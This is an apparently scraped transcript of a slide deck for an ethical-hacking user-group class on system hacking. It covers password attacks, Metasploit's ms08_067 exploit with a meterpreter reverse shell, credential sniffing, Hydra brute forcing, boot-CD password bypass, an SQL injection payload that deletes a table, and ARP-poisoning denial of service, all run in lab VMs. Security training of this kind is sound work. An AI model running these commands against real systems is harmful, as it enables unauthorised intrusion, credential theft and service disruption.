Download
capital area cyber security user group class 4 system hacking using people processes and technology n.
Skip this Video
Loading SlideShow in 5 Seconds..
Capital Area Cyber Security User Group CLASS 4 System Hacking Using People ,Processes, and Technology PowerPoint Presentation
Download Presentation
Capital Area Cyber Security User Group CLASS 4 System Hacking Using People ,Processes, and Technology

Capital Area Cyber Security User Group CLASS 4 System Hacking Using People ,Processes, and Technology

202 Vues Download Presentation
Télécharger la présentation

Capital Area Cyber Security User Group CLASS 4 System Hacking Using People ,Processes, and Technology

- - - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - - -
Presentation Transcript

  1. Capital Area Cyber Security User GroupCLASS 4System HackingUsing People ,Processes, and Technology

  2. Presenter BIO Strengths Weakness Security Interests Something Fun
  3. User group Objective Give students offensive knowledge to better defend computer networks Hands-on security training to compliment theory, put theories into practice “Tell me and I'll forget; show me and I may remember; involve me and I'll understand.” Knowledge sharing: the power of group learning
  4. USER GROUP OBJECTIVE Contd. Group Exercise: What do you seen in the following pictures? 4
  5. USER GROUP OBJECTIVE Contd. Increase experience with a multitude of security aspects Network with other security-minded professionals Play in a safe lab environment not offered at work or home Earn CPEs to maintain certifications without high costs For CISSP Preparing and presenting 2 hour presentation = 8 CPEs Participating 1 hour = 1 CPE Updating existing presentation (see ISC2 chart for specifics) 5
  6. USER GROUP OBJECTIVE Contd. Have your questions answered, bring hard issues that require solutions Improve public speaking and training skills 6
  7. CEH Certified Ethical Hacker Study Guide Kimberly Graves, 2010 Amazon.com Course Chapters: Chapter 1: Introduction to Ethical Hacking, Ethics, and Legality Chapter 2: Gathering Target Information: Reconnaissance, Footprinting, and Social Engineering Chapter 3: Gathering Network and Host Information: Scanning and Enumeration Chapter 4: System Hacking: Password Cracking, Escalating Privileges, and Hiding Files Chapter 5: Trojans, Backdoors, Viruses, and Worms Chapter 6: Gathering Data from Networks: Sniffers Chapter 7: Denial of Service and Session Hijacking Chapter 8: Web Hacking: Google, Web Servers, Web Application Vulnerabilities, and Web-Based Password Cracking Techniques Chapter 9: Attacking Applications: SQL Injection and Buffer Overflows Chapter 10: Wireless Network Hacking Wi-Fi and Ethernet Chapter 11: Physical Site Security Chapter 12: Hacking Linux Systems Chapter 14: Cryptography Chapter 15: Performing a Penetration Test
  8. Course Agenda Class 1: Methodologies and Lab Setup Class 2: Passive Information Gathering Class 3: Active Information Gathering (Nessus) Class 4: Target System Penetration Class 5: Wireless and Wired Network Enumeration Class 6: Privilege Escalation, Maintaining Access, and Malware Class 7: Web Application Penetration Class 8: Covering Tracks, IDS, Reporting, and Cleanup Class 9: Metasploit Class 10: Physical Security (Lock Picking etc.) Class 11: Capture the Flag
  9. Agenda System Hacking Password Attacks Remote Exploits via Metasploit Web Application Penetration Social Engineering Attacks DoS Attacks Exercises
  10. DO NOT perform any activities from this course on any network/system or on a network connected device without proper permission! Make sure you have written permission and authorization to conduct these activities on any system. Conducting any activities related to penetration testing requires the consent of the owner of the target system and the internet service provider. Failure to obtain consent in the form of a legal contract can result in fines and imprisonment.
  11. Information Systems Security Assessment Framework (ISSAF)
  12. CEH Scanning Methodology Kimberly Graves CEH Book
  13. System Penetration With a username/password combination, you can log in to the target via a running service With only a username or password, use an online cracker If both are unknown, use an online cracker, exploit code or an automated exploit tool After gaining access to the target, secure the communications link and escalate user privileges for greater system access
  14. Passwords Security depends highly on passwords and the ability to keep them secret. Something you know Importance of length and complexity People write passwords down Most people use the min required length
  15. Types of Password Attacks Passive Online Active Online Offline Non Electronic
  16. Types of Password Attacks (Passive Online) Sniffing Not detectable Capture the clear text or hash Man in-the-middle Intercept authentication request and forward to server Replay Attacks Capture and latter resend authentication packets Don’t have to know the password, just replay it. Tools: Acquire clear-text passwords over the network using sniffing tools ScoopLM, Ettercap, Cain and Able
  17. Types of Password Attacks (Active Online) Password Guessing Use common default credentials Example user names: administrator, admin, sys, root Example passwords: password, oracle, etc. Connect to a share ex. \\ip _address\c$, SSH, RDP, FTP, Etc. Use automated tools/scripts Using the reconnaissance info create targeted password lists based on high to low probability If min length is 8 don’t try password less than 8 Try most commonly used special char ex !, @, $
  18. Hydra A free, online, login-cracking tool that can attack many services Uses a given username and password combination to brute force the service login Use short username and password lists for best performance Most useful for breaking into a system with a weak password or for which a username is known hydra -l username -P password_list IP_address service
  19. Automated Online Password Guessing Create a simple username and password file using Windows Notepad. Save the file as credentials.txt. Pipe this file using the FOR command to use the credentials.txt file to attempt to log on to the target system’s hidden share. C:\> FOR /F “token=1, 2*” %i in (credentials.txt) do net use \\target\IPC$ %i /u: %j
  20. Types of Password Attacks (Active Online) Defenses: Two-factor authentication Account lockouts/max attempts Log/review brute force attempts C:\windows\system32\config\Sec.Evt /var/log or /var/log/lastlog Password change interval
  21. Types of Password Attacks (Active Online) Defenses: Creating strong passwords 1.Start with a memorable phrase, such as Maryhadalittlelamb 2. Change every other character to uppercase, resulting in MaRyHaDaLiTtLeLaMb 3. Change a to @ and i to 1 to yield M@RyH@D@L1TtLeL@Mb 4. Drop every other pair to result in a secure repeatable password M@H@L1LeMb (this can easily be remade) Do you have any other suggestions?
  22. Types of Password Attacks (Offline) Usually requires physical access Dump password file (shadow/SAM) C:\windows\system32\config vs. /etc/shadow Types of Offline Password Attacks Dictionary ex. Experience Hybrid ex. Exper1ence Brute Force ex. !QAZxdr%16 Given enough time and processing power passwords can be cracked (Moore's Law)
  23. Offline Password Cracking Tools Decrypt passwords stored in Windows SAM or Linux shadow files using dictionary, hybrid, brute-force, or rainbow table methods John the Ripper, Cain and Abel, Ophcrack
  24. John the Ripper Dictionary Attack A free, cross-platform, password-breaking tool that can break many different kinds of encryption DES MD5 Kerberos AFS LM hash Uses offline dictionary and/or brute force attacks to compare encrypted strings and find the password
  25. Types of Password Attacks (Non Electronic) Social Engineering Shoulder Surfing Dumpster Diving
  26. Keyloggers (Hardware/Software) -Software Keyloggers easily detected with anti-virus -Hardware keyloggers hard to detect
  27. Automated Scanning and Exploit Tools Easily analyze overall network security by scanning the network, identifying vulnerabilities, launching attacks, and creating a report in one step Types of tools: Source code assessment: application source code flaws Application assessment: application runtime errors System assessment: system or network configuration problems
  28. Tool Types Source code assessment tools can detect buffer overflows, possible privilege escalation, race conditions, and bad input Rough Auditing Tool for Security (free) Application assessment tools analyze runtime issues AppDetective (commercial) N-Stalker Web Application Security Scanner (free/commercial)
  29. System Assessment Explore vulnerabilities in system-level security measures Nessus (free/commercial) Retina (commercial) Rapid7 (free/commercial)
  30. Metasploit Open source vulnerability assessment tool Select exploit module Configure the exploit Select the payload Launch the exploit Contains console-based GUI and a command-line interface Armitage Find more exploit codes to use with or without Metasploit in online databases www.securityvulns.com
  31. Core IMPACT Commercial GUI automated assessment and exploit tool Contains all the steps of a pen test process from scanning to reporting and cleanup Can return the target system to pre-attack state after a test
  32. Comparison
  33. Custom Exploits Exploit Pack Tool to easily create custom exploits and a new pentest tool competitor http://thehackernews.com/2011/10/exploit-pack-open-source-security.html
  34. Manual Attack Metasploit Attack Attack Summary Identify running services and operating systems by port scanning and fingerprinting Find vulnerabilities Find exploit code or sniff login information Run the exploit against the target Open a target shell on the attacking system Identify the IP address and operating system of the target system Choose an exploit from the database Choose a payload Choose an encoding method Run the exploit against the target
  35. Exploiting Wireless Network WEP cracking can use one or two systems One injects traffic and the other sniffs traffic from the victim Aircrack is a tool that provides everything needed to crack WEP including: Airodump — captures wireless packets Aireplay — performs injection attacks Aircrack — cracks WEP keys Other tools: THC-wardrive WaveStumbler Airsnarf Airsnort Airtraf Omnipeek
  36. Wireless LAN Threat Denial of Service An attack that does not give the attacker access to the system, but makes the service unavailable to users by flooding the target with network packets Types of wireless DoS attacks: Authentication flood Deauthentication flood Network jamming Equipment destruction
  37. Web Application Finding vulnerabilities and exploiting them in the application Allows access to data and even to the system SQL Injection SELECT * FROM items WHERE owner = 'hacker' AND itemname = 'name'; DELETE FROM items; --'
  38. Social Engineering
  39. Lab: System Hacking

  40. Lab Overview Lab setup Exercises
  41. Course Lab Setup Host Operating System = Ubuntu (Linux) Virtual Machine = Virtual Box VM’s = Backtrack, Windows (Guest PC), XP-1, badstore Each laptop has its own separate standalone lab environment How to start the lab environment… 1) Open Virtual Box 2) Ensure that the Backtrack VM is powered on 3) Logon to Backtrack (root/toor) and type startx 4) Set the static IP address (.100) ifconfig eth3 10.0.2.100 netmask 255.255.255.0 up 5) Ensure that the badstore VM has the badstore CD mounted and then start the VM 6) Configure the badstore VM IP address via the following command: ifconfig eth0 10.0.2.200 netmask 255.255.255.0 up 41
  42. Lab Scenario In the following Scenario, you have already gathered as much information about your target as possible for planning the attack. Your target is example.com. The company has hired you to confirm that their continuous monitoring program is working effectively. The administrators claim to have patched and hardened every machine. Now it is your job to see if any of the systems can be hacked.
  43. Attack Attempts Remotely access the application? Example: SQL Injection
  44. Lab 4.1 Web Application Hacking (SQL Injection) Video
  45. Attack Attempts Remotely access the system via social engineering? Example: Malicious email (spear phishing)
  46. Lab 4.2 Social Engineering Toolkit Navigate to http://www.social-engineer.org/framework/Computer_Based_Social_Engineering_Tools:_Social_Engineer_Toolkit_(SET) Read the first paragraph introducing SET. From the table of contents click on 3.1 Spear-Phishing Attack Vector and review how an example of how SET can be used. Note: after gathering all the recon info, it is easy to use the SET to conduct computer based social engineering. Or view the video: http://www.social-engineer.org/resources/Social-Engineering-Email-Attack-using-SET/Social-Engineering-Email-Attack-using-SET.html
  47. Attack Attempts Remotely access the system via network pentesting tools? Example: Metasploit or CoreImpact
  48. Lab 4.3 Nessus (review) From the Guest workstation: Logon u=visitor p=qwerty Open the Nessus client via the link on the desktop From the reports tab, browse the internal network scan report Click on “show filters” Check “exploit exists” Review the exploits that can be run against 10.0.2.15 for high vulnerabilities MS08_067
  49. Lab 4.3 Metasploit Open a terminal in Backtrack and type: msfconsole How many exploits and payloads are available? 684 exploits and 217 payloads Type: show ms08_067 When was the exploit disclosed and what is the ranking? Disclosed: 10/28/2008, Ranking: Great To use the exploit type: use windows/smb/ms08_067_netapi set payload windows/meterpreter/reverse_tcp set lhost 10.0.2.100 set rhost 10.0.2.15 exploit
  50. Lab 4.3 Metasploit A meterpreter session will display. To show the meterpreter option type: help We are going to start a command shell on the victim system Type: execute -f cmd.exe -c –i To confirm your on the victim system type: hostname Note: with an admin user command shell the system is owned. If we did not have admin we would need to escalate privileges.
  51. Lab 4.3 Metasploit Next we will grab a screen capture of the victims screen To review the list of processes type: ps Note the windows explorer process id Migrate the explorer process id, example type: migrate 168 Next load and use meterpreter extension "espia" to enable capture on victim screen Type: use espia Run screengrab to start capturing victim screenshot Type: screengrab
  52. Lab 4.4 Armitage From Backtrack open a terminal and type: armitage Click the “start msf” button It will take a few moments to load Enter the attack computer IP in the dialog box: 10.0.2.100 From the menu bar HostsNmap scanIntense scan Enter range: 10.0.2.0/24 Watch the nmap output as the scan is running When the scan completes, hit “ok” In the search tool bar, type ms08_067 Double click the exploit, review the options , and click launch If the exploit is successful, the icon will have lighting bolts and the console screen will report an open meterpreter session
  53. Lab 4.4 Armitage Kill the meterpreter session, right click the victimmeterpreterkill What if we did not know what attack to use, we could use Armitage to show us available attacks From the menuAttacksFind Attacksby vulnerability Choose “ok” on the dialog box. Rich click the target system AttackSMBms08_067 What if you wanted to automate the process or did not know what to exploit (Hailmary) From the menuAttacksHailmaryby vulnerability Watch as the victim is auto owned
  54. Lab 4.4 Armitage Now that you have a meterpreter session you could dump the hash, grab screen captures, run keyloggers etc. Lets try a victim screen capture Rich click the vicitimmeterpreterexplorescreenshot
  55. Lab 4.5 Core Impact Demo Video
  56. Attack Attempts Passively obtain passwords to remotely access the system? Example: Sniff Passwords
  57. Lab 4.6 Sniffing Passwords Wireshark Right click “my computer” services Right click the “telnet” service change the startup type to automatic Press the “start” button and then hit “ok”. From a Backtrack terminal type: wireshark From the interface list choose eth3 Open another terminal and type: telnet 10.0.2.15 Enter the username and password Stop the running live capture and review it for credentials Right click on a record containing telnet and choose “follow tcp stream” Can you see the password in plan text?
  58. Lab 4.7 Sniffing Passwords Cain and Able From the guest pc, load start Cain and able from the desktop shortcut Press the start/stop sniffing button and a dialog box will appear Choose the network to sniff (10.0.2.0/24) and press “ok” From backtrack, open a terminal and type: telnet 10.0.2.15 Enter the username/password (ex. visitor/qwerty) From the guest pc, click on the sniffer tab, and then click on the passwords tab Right click on the recorded record to view the telnet credential information.
  59. Lab 4.7 Sniffing Passwords Cain and Able Ensure that badstore is up and running. From the guest pc, open a web browser to: http://10.0.2.200/cgi-bin/badstore.cgi Click the login/register link Create a new account Go back to the Cain and able screen Under the passwords tab, click on http Note the username and password has been captured
  60. Attack Attempts Attempt remote logon? via online password attacks using hydra, scripts
  61. Lab 4.8 Hydra Login Cracking We are going to try to get the account information of a user by brute-forcing an Telnet login. Open a command line terminal in BackTrack, type hydra and hit Enter to see the options What options do we need to use to customize hydra to: Input a login name? A file of login names? Input a file of passwords? Try the login name as the password? Stop running after a login pair is found? Limit the number of parallel tasks? Use all the following options with the base command hydra –L users.txt –P passwords.txt 10.0.2.15 telnet Login name file: users.txt Password file: passwords.txt What login name/password combination was found?
  62. Attack Attempts Gain physical access to the system to logon? Example: Password cracking Live CD (Ophcrack), Konboot, Windows Ultimate Boot CD
  63. LAB 4.9 Password Attacks: Konboot 1. From the VM settings menu for XP-1 place the konboot iso in the CD drive. 2. Reboot/boot XP-1 3. The konboot program will boot from the CD . Press enter when the initial konboot screen appears. 4. Once the windows operating system has finished loading you can log on with no password. 5. Click Administrator. Note: you accessed the machine with admin rights and no password.
  64. LAB 4.10 ATTACK: USE OPHCRACK TO CRACK PASSWORDS 1. From the VM settings menu for XP-1 place the Ophrack iso in the CD drive. 2. Reboot the XP-1 3. The Ophcrack program will boot from the CD 4. Choose the following options once the CD boots Choose low RAM Hit of for EN-English Scroll to the bottom and choose US-USA Choose screen of 1024x768x16 Now Ophcrack will auto load and start cracking passwords
  65. LAB 4.10 ATTACK: USE LOPHCRACK TO CRACK PASSWORDS CONTINUED Note: Stop the password cracking once you have cracked 3/5 passwords (~3 minutes) by choosing stop. 4. Record the usernames and passwords 5.Are there any passwords that did not get cracked…? If so, why do you think the password did not get cracked? Note: How short it took to crack the password and the importance of strong passwords. Ophrack XP Rainbow Tables 65
  66. LAB 4.10 ATTACK: USE OPHCRACK TO CRACK PASSWORDS 6. Exit Ophcrack by pressing any key from the terminal window. Then press “Y” to shutdown the PC. 7. Remove Ophcrack from the CD drive. 8. Power on XP-1.
  67. LAB 4.11 Password Attacks: Windows Ultimate Boot CD If konboot does not work, and your not able to get the passwords using Ophcrack, you will need to reset the password. 1. From the VM settings menu for XP-1 place the ubcd4 .iso in the CD drive. 2. Reboot/boot XP-1 3. The Windows Ultimate Boot program will boot from the CD 4. At the welcome screen press enter to “launch” the ubcd program 5. On the preshell window press start shell or wait 3 seconds for it to auto run. 6. The network dialog window will appear, choose No, since you do not want to start the networking configuration.
  68. LAB 4.11 Password Attacks: Windows Ultimate Boot CD 7. When the o/s has finished booting open the password reset tool -startprogramsPassword ToolsNTPWEdit 8. Press the “re-open” button -Note the users on the machine. The true built in admin account will have ID 500. 9.Select the true admin account and press the “change password” button. 10. Press the “save changes” button 11. Press the “exit” button 12. Shutdown XP-1 13. Remove ubcd4 from the VM CD drive on XP-1 14. Boot XP-1 and use the new password for the admin account
  69. Attack Attempts Remotely access the application? Remotely access the system via social engineering? Remotely access the system via network pentesting tools? Obtain passwords to remotely access the system? Attempt remote logon online password attacks? Gain physical access to the system to logon? When all else fails: Denial of Service Failed Failed Failed Failed Failed Failed
  70. Lab 4.12 DoS Attack (Arp Poisoning) Verify that the badstore VM is up and running From the guest pc, open a web browser to the badstore site: http:// 10.0.2.200/cgi-bin/badstore.cgi From backtrack open a terminal and type: ettercap –G From the menusniffunified sniffing Choose the network interface to use: eth3 From the menuHostsscan for hosts Press h to view the host list. From the menuMitmArp poisoning From the guest pc, open a web browser to the badstore site: http:// 10.0.2.200/cgi-bin/badstore.cgi Note the website is not accessible from the guest pc
  71. Lab 4.13 DoS Video
  72. Summary After gaining initial access to the target system, it is necessary to keep going Open a backdoor to maintain access Hide traces of the break-in Escalate privileges and attack other computers on the network with the victim as the attack source Next class: Enumeration and Post Penetration Questions?
  73. Resources http://www.dc-cybersecurity.com/ http://www.amazon.com/Certified-Ethical-Hacker-All-Guide/dp/0071772294 http://www.amazon.com/Certified-Ethical-Hacker-Study-Guide/dp/0470525207/ref=sr_1_1?s=books&ie=UTF8&qid=1323531433&sr=1-1 http://www.amazon.com/Build-Your-Own-Security-Lab/dp/0470179864/ref=sr_1_1?s=books&ie=UTF8&qid=1323535901&sr=1-1 http://en.wikipedia.org/wiki/Kevin_Mitnick Oceans 11 clip: http://www.youtube.com/watch?v=Shg__OqtEwY http://www.independent.co.uk/news/uk/this-britain/rafs-wartime-reconnaissance-photos-go-online-in-new-archive-1825926.html?action=gallery&ino=6 www.anywho.com people.yahoo.com www.zabasearch.com www.peoplesearchnow.com www.ZoomInfo.com www.facebook.com www.Linkedin.com
  74. Resources http://www.backtrack-linux.org/ http://www.de-ice.net/ National Vulnerability Database (nvd.nist.gov) Exploit-Database (exploit-db.com) Securitytracker (www.securitytracker.com) Securiteam (www.securiteam.com) Hackerstorm Vulnerability Research (www.hackerstorm.com) Hackerwatch (www.hackerwatch.org) SecurityFocus (www.securityfocus.com) Security Magazine (www.securitymagazine.com) SC Magazine (www.scmagazine.com) www.myspace.com http://investigatrixx.wordpress.com/2008/10/03/how-to-conduct-your-own-stake-out-surveillance/ http://www.ehow.com/how_4829346_run-credit-check-somebody.html http://bobarno.com/thiefhunters/2009/08/atm-credit-card-fraud-sweden/ 74
  75. Resources http://investigatrixx.wordpress.com/2008/10/03/how-to-conduct-your-own-stake-out-surveillance/ http://www.ehow.com/how_4829346_run-credit-check-somebody.html http://bobarno.com/thiefhunters/2009/08/atm-credit-card-fraud-sweden/ Sarah Palin http://www.youtube.com/watch?v=vgRA8oTk8ig&feature=related http://www.youtube.com/watch?v=4pnKbibi6QY http://en.wikipedia.org/wiki/Robin_Sage http://mirror.anapnea.net/hbgary/aaron_hbgary_com/attachments/5482.pdf www.wigle.net http://archives.cnn.com/2002/TECH/internet/08/22/net.internalmemos/ http://wikileaks.org/ http://johnny.ihackstuff.com/ghdb/ http://uptime.netcraft.com/up/graph www.geektools.com/whois.php www.arin.net http://www.us-cert.gov/cas/bulletins/ www.netstumbler.com 75
  76. Resources http://www.hackerstorm.com/start.html http://www.visualroute.com http://www.iwebtool.com/link_extractor http://it.toolbox.com/blogs/managing-infosec/google-hacking-master-list-28302 http://cirt.net/passwords http://www.social-engineer.org/framework/Computer_Based_Social_Engineering_Tools:_Social_Engineer_Toolkit_(SET) http://www.rapid7.com/docs/metasploit-hackmiami-hack-a-thon.pdf http://www.immunitysec.com/products-documentation.shtml http://vishnuvalentino.com/tips-and-trick/5-steps-to-screen-capture-victim-screen-using-metasploit-meterpreter/ sql injection http://www.youtube.com/watch?v=FwIUkAwKzG8 office space http://www.youtube.com/watch?v=dN3v0drnTdQ core impact http://www.youtube.com/watch?v=SsI41_ZYB8c http://www.qualys.com/docs/wave_vulnerability_management_q2_2010.pdf 76
  77. List of Tools PDF mapping tools to the different phases of Pen testing. Review the list of tools and pick tools that you know and can demonstrate or that you would like to learn more about. CEH Certified Ethical Hacker All-in-One Exam Guide Amazon.com
  78. Parking lot Topics Social Engineering Toolkit Maltego Linux (Mike) Snort Wireshark Nessus Web Security (KB) Crypto (KB) Nmap Metasploit
  79. Suggestions for Improvement TBD